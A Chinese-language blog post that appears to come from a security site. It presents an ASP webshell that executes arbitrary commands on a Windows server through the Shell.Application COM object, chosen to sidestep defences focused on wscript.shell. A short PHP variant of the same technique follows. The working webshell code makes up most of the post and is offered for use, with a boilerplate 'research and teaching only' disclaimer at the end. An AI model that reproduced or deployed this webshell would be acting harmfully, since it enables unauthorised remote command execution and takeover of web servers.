wscript.shell 和 shell.application 这两个组件都是来执行程序的,因此是最不安全的组件。目前很多asp木马执行命令都是用的 wscript.shell ,忽略了 shell.application 。
我们可以首先在一个具有运行权限的目录上传一个bat文件,里面写上我们要运行的命令。然后调用 shell.application 组件运行这个bat。回显可以在bat中用重定向符号 > 到一个文本文件,想看命令的结果去读这个文件就可以了。当然也可以直接调用cmd执行命令。
弄出一个不带回显的,用重定向自己去看吧。XP下测试成功。
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
<%On Error Resume NextDim theFile, thePath, appPath, appName, appArgsappPath = Trim(Request("appPath"))appName = Trim(Request("appName"))appArgs = Trim(Request("appArgs"))If appName = "" ThenappName = "cmd.exe"End If If appPath <> "" And Right(appPath, 1) <> "/" ThenappPath = appPath & "/"End If If LCase(appName) = "cmd.exe" And appArgs <> "" ThenIf LCase(Left(appArgs, 2)) <> "/c" ThenappArgs = "/c " & appArgsEnd IfElseIf LCase(appName) = "cmd.exe" And appArgs = "" ThenappArgs = "/c "End IfEnd IfSet objShellApp = CreateObject("Shell.Application")objShellApp.ShellExecute appName, appArgs, appPath, "", 0%><form method=post onSubmit='this.Submit.disabled=true'>所在路径: <input name=appPath type=text id=appPath value=""" & HtmlEncode(appPath) & """ size=62><br/>程序文件: <input name=appName type=text id=appName value=""" & HtmlEncode(appName) & """ size=62><br/>命令参数: <input name=appArgs type=text id=appArgs value=""" & HtmlEncode(appArgs) & """ size=62><input type=submit name=Submit value=' 运行 '><br/><hr/>注: 只有命令行程序在CMD.EXE运行环境下才可以进行临时文件回显(利用"">""符号),其它程序只能执行不能回显.<br/> 程序文件默认为cmd.exe,请自定义路径,参数处直接写命令.<hr/></form> |
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法
|
1
2
3
4
5
|
<?php $wsh = new COM('Shell.Application') or die("Shell.Application"); $exec = $wsh->open("c://windows//system32//notepad.exe"); //没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。 ?> |
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论